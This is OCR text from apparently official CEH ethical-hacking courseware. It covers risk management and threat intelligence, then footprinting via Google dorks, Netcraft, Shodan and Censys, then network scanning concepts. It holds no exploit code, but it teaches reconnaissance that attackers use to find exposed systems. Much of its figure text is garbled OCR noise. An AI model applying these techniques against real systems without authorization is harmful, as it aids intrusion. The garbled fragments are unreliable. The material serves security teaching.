> Risk and Vulnerability Assessment > Attack Surface Analysis > Threat Intelligence

> Defense-in-depth Security Strategy = Protect endpoints

Respond

=

Protect network

=

Protect data

Detect

> Incident Response

> Continuous Threat Monitoring

Figure 1.7: Continual/Adaptive Security Strategy

Module 01 Page 55

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Defense-in-Depth

‘@

@

|

Defense-in-depth is a security strategy in which several protection layers are placed throughout an information

B @

system

3

Ithelps to prevent direct attacks against

Z

the system and its data because

P}

a break in one layer only leads the attacker to the next layer

P

a

| 2 | "Pa. 2

In

Alyy,

S

ey te tay Me,

fe,

Ne

“a, &

be,

AB

3 g

33

Nieg,

%,

&

%

&

% % o

Strictly Prohibited

Defense-in-Depth

Defense-in-Depth Layers

Defense-in-depth is a security strategy in which security professionals use several protection layers throughout an information system. This strategy uses the military principle that it is more difficult for an enemy to defeat a complex and multi-layered defense system than to penetrate a single barrier. Defense-in-depth helps to prevent direct attacks against an information system and its data because a break in one layer only leads the attacker to the next layer. If a hacker gains access to a system, defense-in-depth minimizes any adverse impact and gives administrators and engineers time to deploy new or updated countermeasures to prevent a recurrence of the intrusion.

Defense-in-Depth Layers Figure 1.8: Defense in Depth

Module 01 Page 56

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

What is Risk?

CE H

@ Risk refers to the degree of uncertainty or expectation that an adverse event may cause damage to the system @ Risks are categorized into different levels accordingto their estimated impact on the system @ A risk matrix is used to scale risk by considering the probability, likelihood, and consequence or impact of the risk Risk Levels

> baad High

Medium

ve!

Risk Matrix Major

Severe

Hig

Extreme

Extreme

coin ae

RS‘i a

High .

Extreme a

|| =

low

Medium

Medium

‘High

RNa tow

low

Medium

Medium

High

Immediate measures should be taken to

> Sameetaie Identify and impose controlsto reduce

81 - 100%

risk toa reasonably low level

= cero ne

> No urgent action is required

> implement controls as soon as possible


Take preventive steps to mitigate the

41-20%

effectsof risk

Cap Probability

Insignificant

Minor

Low

Medium

= igt ed cots, | | Ee o S

=

Probabilty

ow ey

w

ad

lum

Moderate

igh

ledium’

igh

a

it

Note: This is an example ofa risk matrix. Organizations need to create their own risk matrix based on their business needs Al Rights Reserved.

What is Risk? Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions. Alternatively, risk can also be:

=

The probability of the occurrence of a threat or an event that will damage, cause loss to, or have other negative liabilities.

impacts

on the organization,

either from

internal or external

=

The possibility of a threat acting upon an internal or external vulnerability and causing harm to a resource.

=

The product of the likelihood that an event will occur and the impact that the event might have on an information technology asset.

The relation between Risk, Threats, Vulnerabilities, and Impact is as follows: RISK = Threats x Vulnerab

ies x Impact

The impact of an event on an information asset is the product of vulnerability in the asset and the asset’s value to its stakeholders. IT risk can be expanded to

RISK = Threat x Vulnerability x Asset Value In fact, the risk is the combination of the following two factors:

=

The probability of the occurrence of an adverse event

=

The consequence of the adverse event

Module 01 Page 57

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Risk Level Risk level is an assessment of the resulted impact on the network. Various methods exist to differentiate the risk levels depending on the risk frequency and severity. One of the common methods used to classify risks is to develop a two-dimensional matrix. Working out the frequency or probability of an incident happening (likelihood) and its possible consequences is necessary to analyze risks. This is referred to as the level of risk. Risk can be represented and calculated using the following formula: Level of Risk = Consequence x Likelihood Risks are categorized into different levels according to their estimated impact on the system. Primarily, there are four risk levels, which include extreme, high, medium, and low levels. Remember that control measures may decrease the level of a risk, but do not always entirely eliminate the risk. Risk Level | Consequence

Extreme or | Serious or High

Imminent danger

Medium

Moderate danger

Low

Negligible danger

Action >

Immediate measures are required to combat the risk

>

Identify and impose controls to reduce the risk to a reasonably low level

>

Immediate action is not required, but action should be

implement quickly

> | >

Implement controls as soon as possible to reduce the risk to a reasonably low level Take preventive steps to mitigate the effects of risk Table 1.1: Risk Levels

Risk Matrix The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact. It is the graphical representation of risk severity and the extent to which the controls can or will mitigate it. The Risk matrix is one of the simplest processes to use for increased visibility of risk; it contributes to the management’s decision-making capability. The risk matrix defines various levels of risk and categorizes them as the product of negative probability and negative severity. Although there are many standard risk matrices, individual organizations must create their own.

Module 01 Page 58

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Introduction to Ethical Hacking

Insignificant

Minor

Moderate

Major

Severe

81 - 100%

Nan) a Probability

Low

Medium

High

Extreme

Extreme

61-80%

Geo Probability

Low

Medium

Highe

Highe

Extreme

41-60%

Probability

Low

Medium

Medium

High

High

Probability

Low

Low

Medium

Medium

High

Nias) ley

Low

Low

Medium

Medium

High

21-40%

1-20%

Equal Low

Probability

‘.

7

+

5

(i

.,

Table 1.2: Risk Matrix

The above table is the graphical representation of a risk matrix, which is used to visualize and compare risks. It differentiates the two levels of risk and is a simple way of analyzing them. =

Likelihood: The chance of the risk occurring

=

Consequence: The severity of a risk event that occurs

Note: This is an example of a risk matrix. Organizations must create individual risk matrices based on their business needs.

Module 01 Page 59

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Risk Management

CE H

@ Risk management is the process of reducing and maintaining risk at an acceptable level by means of a well-defined and actively employed security program Risk Management Phases

Biskeiientitication:

@

Identifies the sources, causes, consequences, and other details of the internal and external

risks affecting the security of the organization

RISK KGsasement

a Assesses the organization’ risk and provides an estimate ofthe Mahood and impact

Risk Treatment

@ Selects and implements appropriate controls for the identified risks

SS Risk Review

a Ensures approprite contre are implemented tohandle known risks and calculates @ Evaluates the performance of the implemented risk management strategies

Risk Management Risk management is the process of identifying, assessing, responding to, and implementing the activities that control how the organization manages the potential effects of risk. It has a prominent place throughout the security life cycle and is a continuous and ever-increasing complex process. The types of risks vary from organization to organization, but the act of preparing a risk management plan is common to all organizations. Risk Management Objectives =

Identify potential risks—this is the main objective of risk management

=

Identify the impact of risks and help the organization develop better risk management strategies and plans

=

Prioritize the risks, depending on the impact or severity of the risk, and use established risk management methods, tools, and techniques to assist in this task

=

Understand and analyze the risks and report identified risk events.

=

Control the risk and mitigate its effect.

=

Create awareness among the security staff and develop strategies and plans for lasting risk management strategies.

Risk management is a continuous process performed by achieving goals at every phase. It helps reduce and maintain risk at an acceptable level utilizing a well-defined and actively employed security program. This process is applied in all stages of the organization, for example, to specific network locations in both strategic and operational contexts.

Module 01 Page 60

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

The four key steps commonly termed as risk management phases are: =

Risk Identification

=

Risk Assessment

=

Risk Treatment

=

Risk Tracking and Review

Every organization should follow the above steps while performing the risk management process.

=

Risk Identification The initial step of the including the sources, affecting the security of process depends on the another.

=

risk management plan. Its main aim is to identify the risks— causes, and consequences of the internal and external risks the organization before they cause harm. The risk identification skill set of the people, and it differs from one organization to

Risk Assessment This phase assesses the organization’s risks and estimates the likelihood and impact of those risks. Risk assessment is an ongoing iterative process that assigns priorities for risk mitigation and implementation plans, which in turn help to determine the quantitative and qualitative value of risk. Every organization should adopt a risk evaluation process in order to detect, prioritize, and remove risks. The risk assessment determines the kind of risks present, their likelihood and severity, and the priorities and plans for risk control. Organizations perform a risk assessment when they identify a hazard but are not able to control it immediately. A risk assessment is followed by a regular update of all information facilities.

=

Risk Treatment Risk treatment is the process of selecting and implementing appropriate controls on the identified risks in order to modify them. The risk treatment method addresses and treats the risks according to their severity level. Decisions made in this phase are based on the results of a risk assessment. The purpose of this step is to identify treatments for the risks that fall outside the department’s risk tolerance and provide an understanding of the level of risk with controls and treatments. It identifies the priority order in which individual risks should be treated, monitored, and reviewed. The following information is needed before treating the risk: o

The appropriate method of treatment

o

The people responsible for the treatment

o

The costs involved

o

The benefits of treatment

o

The likelihood of success

Module 01 Page 61

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking o =

Exam 312-50 Certified Ethical Hacker

Ways to measure and assess the treatment

Risk Tracking and Review An effective risk management plan requires a tracking and review structure to ensure effective identification and assessment of the risks as well as the use of appropriate controls and responses. The tracking and review process should determine the measures and procedures adopted and ensure that the information gathered to perform the assessment was appropriate. The review phase evaluates the performance of the implemented risk management strategies. Performing regular inspections of policies and standards, as well as regularly reviewing them, helps to identify the opportunities for improvement. Further, the monitoring process ensures that there are appropriate controls in place for the organization’s activities and that all procedures are understood and followed.

Module 01 Page 62

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Introduction to Ethical Hacking

Exam 312-50 Certified Ethical Hacker

Cyber Threat Intelligence

CE H Types of Threat Intelligence

© Cyber Threat intelligence (CTI) is definedas the collection and analysisof information aboutthreatsand

adversariesand the

ZN e

@

3

a

drawing‘ of patterns that provide the ability

2

to make knowledgeable decisionsfor reparedness, prevention, preparedness, prevention, and response p

(

High-level information on

ks

hi

.

enanging risks

ga

; Operational

g

Tactical @

& | | © Consumed by high-level pxceutives gHy Managementand

actionsagainst various cyber-attacks

-,

Strategic

Information on attackers’

TIP:

.

© Consumed by T Service ang Soc Managers, ‘Administrators

\

; Technical

3

@ Information on a specific

© Information on specific

to identify and mitigate various businessrisks

=

@ consumed by Security

© Consumed by SOC Staff

threats; it helpsin implementing various

z

© Cyber threat intelligence helps the organization

é

incoming attack

Managers and Network

H

by converting unknown threats into known

advanced and proactive defense strategies

Defenders

\os ]

resource > intranet

Intranet (Staff Only) - Environment, Health & Safety

This page is for EHS Employees and Guests. If you have any questions or comments, send us feedback by using the Admin

Help Desk form.

https://axerosolutions.com > Blog

HR Intranet: 10 Benefits of an Intranet for Human Resources ‘An HR intranet is excellent for sharing typical HR documents, ranging from health insurance documents, scheduling, contact information, and training manuals. By

https:/vww.claromentis.com > intranet-departments > h Human Resources - HR Intranet Software - Claromentis Intranet software for human

resources teams.

Improve information sharing,

processes, and onboard new employees with our HR intranet software.

streamline

https:/thehrcompany.ie » HR Support for Corporations Human Resources Intranet - The HR Company Human Resources Intranet — used properly, it can be a powerful tool for saving time and

reducing costs. A HR intranet is a proper use of new technology.

Figure 2.2: Search engine results for given Google Advance Operator syntax

Module 02 Page 117

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

Google Hacking Database

CE H

|@ The Google Hacking Database (GHDB) is an authoritative source for querying the everwidening reach of the Google search engine @ Attackers use Google dorks in Google advanced search

operators to extract sensitive information about their target,

such as vulnerable servers, error messages, sensitive files, login pages, and websites

Google Hacking Database Source: https://www.exploit-db.com The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening scope of the Google search engine. In the GHDB, you will find search terms for files containing usernames, vulnerable servers, and even files containing passwords. The Exploit Database is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Using GHDB dorks, attackers can rapidly identify all the publicly available exploits and vulnerabilities of the target organization’s IT infrastructure. Attackers use Google dorks in Google advanced search operators to extract sensitive information about the target, such as vulnerable servers, error messages, sensitive files, login pages, and websites. Google Hacking Database Categories:

=

Footholds

=

Files Containing Juicy Info

=

Files Containing Usernames

=

Files Containing Passwords

=

Sensitive Directories

=

Sensitive Online Shopping Info

=

Web Server Detection

=

Network or Vulnerability Data

=

Vulnerable Files

=

Pages Containing Login Portals

=

Vulnerable Servers

=

Various Online Devices

=

Error Messages

=

Advisories and Vulnerabilities

Module 02 Page 118

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

%% Exploit Database - Exploitsfor? Xe

© Maps

=

Settings +

Anytime + Related Searches

Hire a Professional Hacker - Certified Ethical Hackers

.

Hire Hackers/Shop hacking tools today! Being an organization that's fully committed to solving sveryday problems in the hacking community, we offer all kinds of hacking services. Furthermore, once you've successfully signed up with one of our hackers for any project, we'll

give direct and unlimited access to our online store to shop for

hintsimsienieniniensin iilegal hackers for hire

Ineed a hackers help

© hupsiivwupwork.com » hire > hackers

27 Best Freelance Hackers For Hire In March 2022 - Upwork™

best hackers for hire

Hire the best Hackers. Get to know top Hackers. And say hello to the newest memberof your team. Get Started, Clients rate Hackers. Rating is 47 out of 5. 47/5, based on 1,807 client reviews. $50/hr.

SS ene

oe

hire a hacker for gmail

WH hupsi/iwww.hackerforhire.net




ire X | + at DuckDuckGo @ hackerforh

Hire the #1 Hire a Hacker Cyber Service

find a hacke

We are a US Based Service 3001 W Indian School Rd. Phoenix, AZ 85017. 480-400-4600

>

|

Figure 2.26: Screenshot of Tor Browser

Module 02 Page 151

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

Determining the Operating System |@ SHODAN search engine lets you find connected devices (routers, servers, 1oT, etc.) using a variety of filters

CE H

| Censys search engine provides a full view of every server and device exposedto the Internet

ee

te

=

185.8.175.117

‘tps www sono

tte /oensysio

Determining the Operating System Attackers use various online tools such as Netcraft, Shodan, and Censys to detect the operating system used at the target organization. These tools search the Internet for detecting connected devices such as routers, servers, and loT devices belonging to the target organization. Using these tools, attackers obtain information such as the city, country, latitude/longitude, hostname, operating system, and IP address of the target organization. Such information further helps attackers in identifying potential vulnerabilities and finding effective exploits to perform various attacks on the target.

Module 02 Page 152

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance =

Exam 312-50 Certified Ethical Hacker

Netcraft Source: https://www.netcraft.com The technique of obtaining information about the target network operating system is

called OS fingerprinting. Open https://www.netcraft.com/tools/ in the browser and type

the URL of the target website in the What's that site running? field. Attackers use the Netcraft tool to identify all the sites associated with the target domain along with the operating system running at each site. I



Site report for https://www.micrs

>

Xb

C _ @ sitereport.netcraft.com/?url=https%3A%2F%2Fwww.microsoft.com%2F

AMETCRAFT Site report for https://www.microsoft.com > Q Look up another site?

@ Background Site title

Microsoft - Cloud, Computers, Apps & Gaming

Site rank

64

Description

Explore Microsoft products and services for your home or business. Shop Surface, Microsoft 365,

Xbox, Windows, Azure, and more. Find downloads and get support.

Date first seen Netcraft Risk Rating @

p..

English

Domain

microsoft.com

Primary language

& Network Site

hitps://www.microsoft.com Z

Netblock Owner

Akamai International, BV

Hosting company

Akamai Technologies

ns1-205.azure-dns.com

Domain registrar

markmonitor.com

Nameserver lage

Hosting country |

Nameserver

EEE

whois.markmonitor.com nee

Figure 2.27: Screenshot of Netcraft showing results for Microsoft

Module 02 Page 153

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

:

EE Site report for https://www.micre



C _

@

Exam 312-50 Certified Ethical Hacker

y

x

sitereport.netcraft.com/?url=https%3A%2F%2Fwww.microsoft.com%2F

er

-

a 8

Netblock owner

IP address

Web server

Last seen

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

184.31.225.172

unknown

—_5-Mar-2022

Akamai

88.221.16.244

unknown

26-Feb-2022

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

184.31.225.172

unknown

19-Feb-2022

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

104.110.245.246

unknown

—_5-Feb-2022

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

184.31.225.172

unknown

28-Jan-2022

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

104.110.245.246

unknown

21-Jan-2022

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

23.47.197.197

unknown

—7-Jan-2022

Akamai Technologies

92.122.165.100

unknown

31-Dec-2021

Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142

104.110.245.246

unknown

24-Dec-2021

Akamai Technologies

92.122.165.100

unknown

‘16-Dec-2021

xX 2

Figure 2.28: Screenshot of Netcraft showing target operating system

=

SHODAN Search Engine

Source: https://www.shodan.io Shodan is a computer search engine that searches the Internet for connected devices (routers, servers, and loT.). You can use Shodan to discover which devices are connected to the Internet, where they are located, and who is using them.

It helps attackers to keep track of all the devices on the target network that are directly accessible from the Internet. It also allows the attacker to find devices based on the city, country, latitude/longitude, hostname, operating system, and IP address. Further, it helps the attacker to search for known vulnerabilities and exploits across Exploit DB, Metasploit, CVE, OSVDB, and Packetstorm with a single interface. As shown in the screenshot, attackers use this tool to detect various target devices connected to the Internet along with the operating system used.

Module 02 Page 154

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

govate com

912,502. OUNTRI

View Report

Browse Images

out Shodan Monitor

54.146.208.121 (7

ye Germany

154,763

China

138,153

com ‘Amazon Data ServicesNoVa © Unites States, Ashoum

& SSL Certificate Issued By. |-Commen Name. RS

Korea, Republic of Francess,049°°°4 More...

Diffie-Hellman Fingerprint: RFCS114/2048bit MODP Group with 24-bit Prime Order ‘Subgroup

388,601 340,200 58,404 20,287 12,918

52.54.15.38 7

Synology Disk Station 273,305

HTTP/1.1 481 Unauthorized Date: Tue, @8 Mar 2022 11:03:03 GT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; X-XSS-Protection: 1; modesblock X-Content-Type-Options: nosniff Feature-Policy: microphone ‘none’; camera ‘none’; geolocation

(Organization: Let's Enerypt Issued To: |- Common Name: cthiesandeompliance huntsman.com ‘Supported SSL Versions: TLsv1.2, Tusa

United States84,393

Synology DiskStation Manager (DSM) 6.2.4.25556 Synology Diskstation 99° ‘Manager (OSM) 7.0.1.42218

(0 View on Map

New Service: Keep track of what you have connected to the Internet. Check

5414820 c5omeute

FOP PORTS 5001 5000 443 80 7001 More...

©

5153 comeus'S ~ ‘Amazon Technologies

United States, Ashburn

Q SSL Certificate Issued By: |-Commen Name Ro

(Organization:

HITP/1.1 401 Unauthorized Date: Tue, @8 Mar 2022 11: Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Feature-Policy: microphone ‘none’; camera ‘none’; geolocation

Figure 2.29: Screenshot of SHODAN Search Engine showing target operating system

Module 02 Page 155

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

Censys

Source: https://censys.io Censys monitors the infrastructure and discovers unknown assets anywhere on the Internet. It provides a full view of every server and device exposed to the Internet. Attackers use this tool to monitor the target IT infrastructure to discover various devices connected to the Internet along with their details such as the operating system used, IP address, protocols used, and geographical location.

¢ Censys

ates»

tes8175107

185.8.175.117 s of Mar 8, 2022 6:29am UTC Latest summary fA Explore 3 Histoy @ WHO [Basic information

08 Network Routing Protocols

ie PARVASYSTEM (IR) 185.8.175.0/24 vie AS60631 25/SMTP, §3/DNS, 80/HTTP, 86/HTTP, 110/POPS, 143/IMAP, 366/SMTP , 587/SMTP 1000/HTTP , 1433/MSSQL, 3000/HTTP , 3389/ROP , B595/HTTP, 53413/NETIS

25/SMTP @

served Mar 07,2022 0824p

sora

+

aghdad

ens

BS. ice . ee Geographic Location

Load

Country tran (IR)

EHLO

stan TLs

not avai Figure 2.30: Screenshot of Censys Search Engine showing target operating system

Module 02 Page 156

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

VoIP and VPN Footprinting through SHODAN

=

g



C EH

=

Or vl

a

a

= 3 =

.

tte: /fuww shodon io

VoIP and VPN Footprinting through SHODAN Source: https://www.shodan.io Shodan is a search engine that enables attackers to perform footprinting at various levels. It is used to detect devices and networks with vulnerabilities. A search in Shodan for VoIP and VPN footprinting can deliver various results, which will help gather VPN- and VolP-related information.

Module 02 Page 157

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Footprinting and Reconnaissance

Exam 312-50 Certified Ethical Hacker

The following screenshots show some of the VPN and VoIP footprinting search results obtained through Shodan:

44 View Report

257,685

New Service: Keep track of what you have connected to the Internet. Check out Shodan Mon 151.41.130.64

64-130.41-1

Ps

Italy Germany Taiwan

United States

AN tay, Rin

245,224 3838 2.410 939

France

520

181.24.253.246 i

Ppp-24

a Mia Rome—

2768 1,985

80

895

1900 More.

268

WIND TRE S.PA.

Wing Telecomunicazioni spa ni 2894 Wind telecomunicazioony one 5,386

voir D-Link DVS-40885, DVS-

334

agzroot

ag=105965@-+6F01897-

Content-L...

35@6-Babd7 -10961472

rport=2681@;branch-Foo

151.54.247.153 wi

HM ay, Catania

484 Not Found

User-Agent: DLink VoIP Stack Supported: replaces, timer, s0@re1

132,524

WIND Telecomunicazioni SpA 78,722 WINDTRE s.p.a 7,100

From: tracert Tracing hops:

216.239.36.10

route

to

ns3.google.com

[216.239.36.10]

1

Website, email, Whois, and DNS footprinting > Network footprinting and footprinting through social engineering > Some important footprinting tools > How organizations can defend against footprinting and reconnaissance activities Q Inthe next module, we will discuss in detail how attackers, ethical hackers, and pen testers perform network scanningto collect information about a target of evaluation before an attack or audit

Module Summary This module presented footprinting concepts along with the objectives of footprinting. It provided a detailed explanation of the various techniques used for footprinting through search engines. Further, it described footprinting through web services and social networking sites. In addition, it discussed website and email footprinting techniques. It also explained Whois and DNS footprinting in detail. Moreover, it described network footprinting along with traceroute analysis. It also explained footprinting through social engineering. Finally, it presented an overview of important footprinting tools. The module ended with a detailed discussion of how organizations can defend themselves against footprinting and reconnaissance activities. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform network scanning to collect information about a target for evaluation before an attack or audit.

Module 02 Page 256

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

-

Certified | Ethical



EC-Council

Hacker

MODULE 03 SCANNING Li

Ge

HT as

oft d



me

q

> F

NETWORKS — v t —T =

.

D)

EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

o

© LO#01: Explain Network Scanning Concepts

OBJECTIVES

LO#05: Demonstrate Various Scanning Techniques for OS Discovery

o

LEARNING

LO#06: Demonstrate Various Techniques for Scanning

@ LO#02: Use Various Network Scanning Tools

Beyond IDS and Firewall

® LO#03: Demonstrate Various Scanning Techniques

for Host Discovery

LO#07: Explain Network Scanning Countermeasures

© LO#04: Demonstrate Various Scanning Techniques for Port and Service Discovery

Learning Objectives After identifying the target and performing the initial reconnaissance, as discussed in the Footprinting and Reconnaissance module, attackers begin to search for an entry point into the target system. Attackers should determine whether the target systems are active or inactive to reduce the time spent on scanning. Notably, the scanning itself is not the actual intrusion but an extended

form

of reconnaissance

in which

the

attacker

learns

more

about

his/her

target,

including information about OSs, services, and any configuration lapses. The information gleaned from such reconnaissance helps the attacker select strategies for attacking the target system or network. This module starts with an overview of network scanning and provides insights into various host discovery techniques that can be used to check for live and active systems. Furthermore, it discusses various port and service discovery techniques, operating system discovery techniques, and techniques for scanning beyond IDS and firewalls. Finally, it ends with an overview of drawing network diagrams.

At the end of this module, you will be able to: =

Describe the network scanning concepts

=

Use various scanning tools

=

Perform host discovery to check for live systems

=

Perform port and service discovery using various scanning techniques

=

Perform operating system (OS) discovery

=

Scan beyond intrusion detection systems (IDS) and firewalls

=

Explain various network scanning countermeasures

Module 03 Page 259

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Explain Network Scanning Concepts

Network Scanning Concepts As already discussed, footprinting is the first phase of hacking, in which the attacker gains primary information about a potential target. He/she then uses this information in the scanning phase to gather more details about the target.

Module 03 Page 260

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Overview of Network Scanning

CE

] ] ‘@ Network scanning refers to a set of procedures ] used for identifying hosts, ports, and services ;| in a network | ‘@

Network scanning is one of the components of

] ] ]

intelligence gathering which can be used by an

Network Scanning Process Sends

TePf probes

attacker to create a profile of the target

|

=

Attacker

organization

© To discover live hosts, IP address, and open ports of live hosts Objectives of

Network

Scanning

©

To discover operating systems and system architecture

@ To discover services running on hosts @

To discover vulnerabilities in live hosts

Overview of Network Scanning Scanning is the process of gathering additional detailed information about the target using highly complex and aggressive reconnaissance techniques. Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. Network scanning is also used for discovering active machines in a network and identifying the OS running on the target machine. It is one of the most important phases of intelligence gathering for an attacker, which enables him/her to create a profile of the target organization. In the process of scanning, the attacker tries to gather information, including the specific IP addresses that can be accessed over the network, the target’s OS and system architecture, and the ports along with their respective services running on each computer. Sends TCP/IP probes

>

|

Gets network information

Attacker

Network Figure 3.1: Network scanning process

The purpose of scanning is to discover exploitable communications channels, probe as many listeners as possible, and track the ones that are responsive or useful to an attacker’s particular needs. In the scanning phase of an attack, the attacker tries to find various ways to intrude into a target system. The attacker also tries to discover more information about the target system to determine the presence of any configuration lapses. The attacker then uses the information obtained to develop an attack strategy.

Module 03 Page 261

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Types of Scanning =

Port Scanning— Lists the open ports and services. Port scanning is the process of checking the services running on the target computer by sending a sequence of messages in an attempt to break in. Port scanning involves connecting to or probing TCP and UDP ports of the target system to determine whether the services are running or are in a listening state. The listening state provides information about the OS and the application currently in use. Sometimes, active services that are listening may allow unauthorized users to misconfigure systems or to run software with vulnerabilities.

=

Network Scanning — Lists the active hosts and IP addresses. Network scanning is a procedure for identifying active hosts on a network, either to attack them or assess the security of the network.

=

Vulnerability Scanning — Shows the presence of known weaknesses. Vulnerability scanning is a method for checking whether a system is exploitable by identifying its vulnerabilities. A vulnerability scanner consists of a scanning engine and a catalog. The catalog includes a list of common files with known vulnerabilities and common exploits for a range of servers. A vulnerability scanner may, for example, look for backup files or directory traversal exploits. The scanning engine maintains logic for reading the exploit list, transferring the request to the web server, and analyzing the requests to ensure the safety of the server. These tools generally target vulnerabilities that secure host configurations can fix easily through updated security patches and a clean web document.

A thief who wants to break into a house looks for access points such as doors and windows. These are usually the house’s points of vulnerability, as they are easily accessible. When it comes to computer systems and networks, ports are the doors and windows of a system that an intruder uses to gain access. A general rule for computer systems is that the greater the number of open ports on a system, the more vulnerable is the system. However, there are cases in which a system with fewer open ports than another machine presents a much higher level of vulnerability. Objectives of Network Scanning The more the information at hand about a target organization, the higher are the chances of knowing a network’s security loopholes, and, consequently, for gaining unauthorized access to it. Some objectives for scanning a network are as follows: =

Discover the network’s live hosts, IP addresses, and open ports of the live hosts. Using the open ports, the attacker will determine the best means of entering into the system.

=

Discover the OS and system architecture of the target. This is also known as fingerprinting. An attacker can formulate an attack strategy based on the OS’s vulnerabilities.

=

Discover the services running/listening on the target system. Doing so gives the attacker an indication of the vulnerabilities (based on the service) that can be exploited for gaining

access to the target system. =

Identify specific applications or versions of a particular service.

Module 03 Page 262

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks =

Exam 312-50 Certified Ethical Hacker

Identify vulnerabilities in any of the network systems. This helps compromise the target system or network through various exploits.

Module 03 Page 263

an

attacker

to

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

TCP Communication Data contained

There will be

should be

transmissions

in the packet

CE H

Resets a

no further

processed

Flags connection

Source Port

Destination Port

$

immediately



Sequence No

URG

FIN

(orgent)

RST

Finish)

PSH

(Push)

Sends all buffered data immediately

A

eset ACK

(Acknowledgement)

Acknowledges the receipt of a packet

Acknowledgement No

offs Res |TCPFlags

sYN

_
demo - NetScanTools® Pro Demo Version Build 7-3-2019 based on version 11.863

-

Click hereto Buy Now! Port Range and Scan Mode Fut connect OrcP PortRange upp Ports Only ser —_} 1 Orer ruts Ports 2 ws OTN San HtfOpen)

Target Hostname oI Address (woe~~—+d«~K (se se TagetTage List when carne Scanig

End 256

‘Scan Complete - 256 ports scanned in 5 sec.

Scan Range ofPorts _| NetorkIntrface

Sean Commen Ports Edit Common Ports Uist Edt Target ust

OreP custom Sean

x

